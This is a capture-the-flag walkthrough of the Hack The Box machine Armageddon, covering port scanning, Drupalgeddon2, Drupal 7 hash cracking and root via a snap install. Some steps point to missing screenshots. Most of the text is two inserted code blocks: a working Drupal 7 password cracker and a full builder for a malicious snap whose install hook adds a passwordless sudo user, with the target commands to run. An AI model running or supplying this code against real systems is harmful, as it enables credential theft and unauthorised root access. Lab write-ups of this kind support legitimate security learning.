This post documents the complete walkthrough of Armageddon, a retired vulnerable VM created by bertolis, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.


Background

Armageddon is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.233 --rate=500
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-03-28 14:34:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.233
Discovered open port 80/tcp on 10.10.10.233

Nothing unusual stands out. Let’s do one better with nmap, scanning the discovered ports to establish their services and versions.

nmap -n -v -Pn -p22,80 -A --reason 10.10.10.233 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

OK, at least we know it’s CentOS. This is what the http service looks like.

Why is Armageddon represented by a :chicken: :laughing:? The http-generator meta tag nmap pulled already says Drupal 7, and a look at the HTML source code confirms that we are dealing with Drupal 7 here.

CVE-2018-7600 - Drupalgeddon2

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

I found the perfect exploit.

Foothold

There you have it.

From apache to brucetherealadmin

There’s a user with a uid of 1000. I reckon user.txt is in the home directory of this user.

Getting the password hash from the database

The database configuration is in /var/www/html/sites/default/settings.php.

Armed with that, we can take a peek at Drupal’s users table, particularly brucetherealadmin.

Cracking the password hash with John the Ripper is a breeze.
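To show what John is actually computing when it cracks a Drupal 7 hash, here is an added example (my own code, not the page's or Drupal's) that reimplements Drupal 7's `$S$` scheme, as stored in the `pass` column of the `users` table, and runs a small wordlist against it. The hash and the candidate passwords in the check are constructed; the iteration count character `D` (2^15 rounds of SHA-512) is Drupal 7's default and is why a dictionary attack on a weak password is still quick despite the stretching.

```python
"""Drupal 7 ($S$) password hashing, reimplemented for verification.

Layout of a stored hash, 55 characters total (DRUPAL_HASH_LENGTH):
  '$S$' + one itoa64 char giving log2(iterations) + 8-char salt +
  phpass-style base64 of SHA-512 iterated 2^count_log2 times, truncated.
Added example; hashes produced here are freshly generated, not the box's.
"""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55
DEFAULT_COUNT_LOG2 = 15  # Drupal 7's DRUPAL_HASH_COUNT -> '$S$D...'


def _phpass_b64(data: bytes) -> str:
    """phpass/Drupal base64: little-endian 3-byte groups, custom alphabet."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> str:
    """Recompute the hash from a password and the first 12 chars of a stored hash."""
    setting = setting[:12]
    if not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 ($S$) hash")
    count_log2 = ITOA64.index(setting[3])
    salt = setting[4:12].encode()
    pw = password.encode()
    h = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):          # key stretching
        h = hashlib.sha512(h + pw).digest()
    return (setting + _phpass_b64(h))[:DRUPAL_HASH_LENGTH]


def new_hash(password: str, count_log2: int = DEFAULT_COUNT_LOG2) -> str:
    """Generate a fresh hash the way Drupal 7 does (6 random bytes -> 8-char salt)."""
    setting = "$S$" + ITOA64[count_log2] + _phpass_b64(os.urandom(6))
    return drupal7_hash(password, setting)


def check_password(password: str, stored_hash: str) -> bool:
    return hmac.compare_digest(drupal7_hash(password, stored_hash), stored_hash)


def crack(stored_hash: str, wordlist):
    """Return the first candidate that matches, or None. This is John's loop."""
    for candidate in wordlist:
        if check_password(candidate, stored_hash):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo: hash a known password, then recover it from a tiny list.
    demo = new_hash("correct horse")
    print(demo)
    print("recovered:", crack(demo, ["123456", "password", "correct horse"]))
```

In practice the same thing is `john --format=Drupal7 --wordlist=rockyou.txt hash.txt` with the `$S$...` string in `hash.txt`; the point of the reimplementation is that the 8-byte salt is stored in the clear and the cost is only 32768 SHA-512 calls per guess, so a password in a common wordlist falls in seconds.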

With the password in hand, we can simply log in to the account over SSH and retrieve user.txt.

Privilege Escalation

During enumeration of brucetherealadmin’s account, I notice the account is able to sudo as root without a password on the following.

I take it that I need a malicious snap package.

dirty_sock

Well, someone already left the dirty_sock exploit here. Thank you kind stranger! :heart_eyes:

The exploit adds a user (dirty_sock:dirty_sock) with full sudo access.
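For anyone who does not find a ready-made exploit lying around, here is an added example (my own code, a from-scratch version of the dirty_sock idea rather than its code) that lays out a snap whose `meta/hooks/install` script creates a sudo-capable user. It works because snapd runs the install hook as root, and `--dangerous` lets an unsigned local `.snap` be installed. The snap name `dirty-sock`, the user `dirty_sock:dirty_sock` and the `sudoers.d` drop-in are my choices; packing the tree needs `mksquashfs` from squashfs-tools, which the offline check does not require.

```python
"""Build a snap whose install hook adds a sudo user (dirty_sock-style).

Added example. Tree layout a .snap must contain:
  meta/snap.yaml       -- package metadata
  meta/hooks/install   -- executable; snapd runs it as root on install
Assumptions: snap name 'dirty-sock', devmode confinement, and that the
host's sudo rule permits 'snap install' with --dangerous --devmode.
"""
import os
import shutil
import stat
import subprocess
import tempfile
import textwrap

SNAP_NAME = "dirty-sock"


def snap_yaml(name: str = SNAP_NAME) -> str:
    """Minimal snap.yaml; devmode keeps the hook out of confinement."""
    return textwrap.dedent(f"""\
        name: {name}
        version: '0.1'
        summary: install hook demo
        description: adds a local sudo user from the install hook
        architectures:
          - amd64
        confinement: devmode
        grade: devel
        """)


def install_hook(user: str, password: str) -> str:
    """Shell run by snapd as root. chpasswd avoids embedding a crypt hash;
    a sudoers.d drop-in leaves /etc/sudoers itself untouched (CentOS 7
    includes /etc/sudoers.d by default)."""
    return textwrap.dedent(f"""\
        #!/bin/sh
        useradd -m -s /bin/bash '{user}' || true
        echo '{user}:{password}' | chpasswd
        echo '{user} ALL=(ALL:ALL) NOPASSWD: ALL' > /etc/sudoers.d/{user}
        chmod 0440 /etc/sudoers.d/{user}
        """)


def make_workdir() -> str:
    return tempfile.mkdtemp(prefix="snapbuild-")


def build_snap_tree(root: str, user: str, password: str) -> dict:
    """Write snap.yaml and the install hook under root; return their paths."""
    hooks = os.path.join(root, "meta", "hooks")
    os.makedirs(hooks, exist_ok=True)
    yaml_path = os.path.join(root, "meta", "snap.yaml")
    hook_path = os.path.join(hooks, "install")
    with open(yaml_path, "w") as f:
        f.write(snap_yaml())
    with open(hook_path, "w") as f:
        f.write(install_hook(user, password))
    os.chmod(hook_path, 0o755)  # snapd will not run a non-executable hook
    return {"snap.yaml": yaml_path, "install": hook_path}


def hook_is_executable(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_IXUSR)


def read_text(path: str) -> str:
    with open(path) as f:
        return f.read()


def pack_snap(root: str, out_file: str) -> str:
    """Squash the tree into a .snap (same flags snapcraft uses)."""
    if shutil.which("mksquashfs") is None:
        raise RuntimeError("mksquashfs not found; install squashfs-tools")
    subprocess.run(["mksquashfs", root, out_file, "-noappend", "-comp", "xz",
                    "-no-xattrs", "-all-root"], check=True)
    return out_file


if __name__ == "__main__":
    work = make_workdir()
    build_snap_tree(work, "dirty_sock", "dirty_sock")
    out = pack_snap(work, os.path.abspath(f"{SNAP_NAME}.snap"))
    print(f"built {out}; on the target run:")
    print(f"  sudo snap install --dangerous --devmode {out}")
    print("  su - dirty_sock   # password: dirty_sock, then sudo -i")
```

The invocation on the box has to match whatever `sudo -l` actually permits; `--dangerous` is what allows an unsigned, locally built snap, and `--devmode` matches the confinement declared in `snap.yaml`. If the install succeeds but the user is missing, check `snap changes` and `snap tasks <id>` for the hook's stderr before assuming the rule did not fire.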

:dancer: